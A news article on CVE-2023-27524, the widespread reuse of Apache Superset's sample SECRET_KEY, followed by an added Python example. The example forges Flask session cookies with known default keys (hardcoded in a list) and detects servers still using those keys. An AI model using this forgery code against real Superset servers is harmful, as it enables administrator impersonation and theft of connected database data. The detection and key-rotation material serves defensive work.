67% of public Apache Superset servers use the secret key from the sample configuration

Researchers from Horizon3 have found a security problem in a large share of installations of the Apache Superset data exploration and visualization platform. Of 3176 public Apache Superset servers examined, 2124 were using a shared default key, the one specified in the sample configuration file. This key is used by the Flask framework underneath Superset to sign session cookies, so an attacker who knows it can forge a session cookie for any user, log in to the Apache Superset web interface, pull data from the connected databases, or execute code with the privileges of the Apache Superset process.

Notably, the researchers first reported the problem to the developers back in 2021. As a result, in Apache Superset 1.4.1, released in January 2022, the default value of the SECRET_KEY parameter was replaced with the string "CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET" and a warning was added when that value is in use.

In February of this year the researchers decided to rescan the affected systems and found that few had heeded the warning: 67% of Apache Superset servers still use keys taken from sample configurations, deployment templates, or the documentation. Among the organizations running with these known keys are some large companies, universities, and government agencies.


Shipping a working key in the sample configuration is now treated as a vulnerability (CVE-2023-27524). It was fixed in Apache Superset 2.1 by raising an error that stops the platform from starting if the key from the sample configuration is in use. (Only the key from the current version of the sample configuration is checked; older defaults and keys taken from templates and documentation are not blocked, so upgrading alone does not close the hole for those deployments.) The researchers also published a script for checking the installations on a network for the problem.
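To make the mechanism concrete, here is an added example; it is not code from the article, from Horizon3, or from the Superset project. It reproduces the signing scheme Flask uses for the "session" cookie (itsdangerous' URLSafeTimedSerializer with salt "cookie-session", "hmac" key derivation and SHA-1 HMAC), forges a cookie with a known default key, and checks a captured cookie against a list of candidate default keys, which is the test the researchers' script performs against live servers. The session field names `_user_id` and `_fresh` follow Flask-Login, the candidate list holds two historical Superset defaults, and the cookie values are constructed here rather than captured; all of that is an assumption made for the demonstration.

```python
"""Flask-style session cookie forgery and default-SECRET_KEY detection.

Added example; not code from the article, Horizon3 or the Superset project.
It mirrors the signing scheme of itsdangerous' URLSafeTimedSerializer as
Flask configures it for the "session" cookie: salt "cookie-session",
"hmac" key derivation and SHA-1 HMAC signatures.
"""
import base64
import hashlib
import hmac
import json
import secrets
import time
import zlib
from typing import Iterable, Optional

SALT = b"cookie-session"  # Flask's SecureCookieSessionInterface.salt

# Candidate defaults to test against. Assumption: two historical Superset
# defaults; extend the list with the rest of the keys named by Horizon3.
KNOWN_DEFAULT_KEYS = [
    "CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET",          # superset/config.py since 1.4.1
    "\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h",  # the older config.py default
]


def _b64(data: bytes) -> bytes:
    """URL-safe base64 without padding, as itsdangerous writes it."""
    return base64.urlsafe_b64encode(data).rstrip(b"=")


def _b64d(data: bytes) -> bytes:
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))


def _derive_key(secret_key: str) -> bytes:
    """itsdangerous 'hmac' key derivation: HMAC-SHA1(secret_key, salt)."""
    return hmac.new(secret_key.encode(), SALT, hashlib.sha1).digest()


def _signature(secret_key: str, signed_value: bytes) -> bytes:
    return _b64(hmac.new(_derive_key(secret_key), signed_value, hashlib.sha1).digest())


def make_session_cookie(secret_key: str, session: dict, timestamp: Optional[int] = None) -> str:
    """Build 'payload.timestamp.signature' exactly as Flask's serializer does."""
    # Flask's default JSON provider emits compact JSON with sorted keys.
    payload = json.dumps(session, separators=(",", ":"), sort_keys=True).encode()
    compressed = zlib.compress(payload)
    body = _b64(payload)
    if len(compressed) < len(payload) - 1:  # itsdangerous compresses when it pays off
        body = b"." + _b64(compressed)
    ts = int(time.time()) if timestamp is None else timestamp
    ts_b64 = _b64(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    signed = body + b"." + ts_b64
    return (signed + b"." + _signature(secret_key, signed)).decode()


def decode_session(cookie: str) -> dict:
    """Read the session payload; it is only signed, never encrypted."""
    body = cookie.encode().rsplit(b".", 2)[0]
    raw = zlib.decompress(_b64d(body[1:])) if body.startswith(b".") else _b64d(body)
    return json.loads(raw)


def find_default_key(cookie: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the candidate SECRET_KEY that validates the cookie, or None.

    This is the check a scanner runs on the 'session' cookie a Superset
    server hands out: if any known default verifies the signature, the
    server is forgeable.
    """
    signed, sep, sig = cookie.encode().rpartition(b".")
    if not sep:
        return None
    for key in candidates:
        if hmac.compare_digest(_signature(key, signed), sig):
            return key
    return None


def generate_secret_key() -> str:
    """42 random bytes, base64-encoded: the form Superset's docs recommend
    (openssl rand -base64 42)."""
    return base64.b64encode(secrets.token_bytes(42)).decode()


if __name__ == "__main__":
    # Constructed demo: a server still on the 1.4.1 default hands out this cookie.
    weak = make_session_cookie("CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET", {"_user_id": "1", "_fresh": True})
    print("cookie:", weak)
    print("default key in use:", find_default_key(weak, KNOWN_DEFAULT_KEYS))
    print("session payload:", decode_session(weak))
    strong = make_session_cookie(generate_secret_key(), {"_user_id": "1", "_fresh": True})
    print("random key detected as default:", find_default_key(strong, KNOWN_DEFAULT_KEYS))
```

In practice the input to `find_default_key` is the "session" cookie the target sets on its login page; a hit means any visitor can mint an administrator session with `make_session_cookie` and the same key. The fix is a fresh value from `generate_secret_key` in SECRET_KEY. Rotating it invalidates every active session and, because Superset also encrypts stored database credentials with the same key, should follow the project's documented key rotation procedure rather than a bare edit of the config file.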



Source: opennet.ru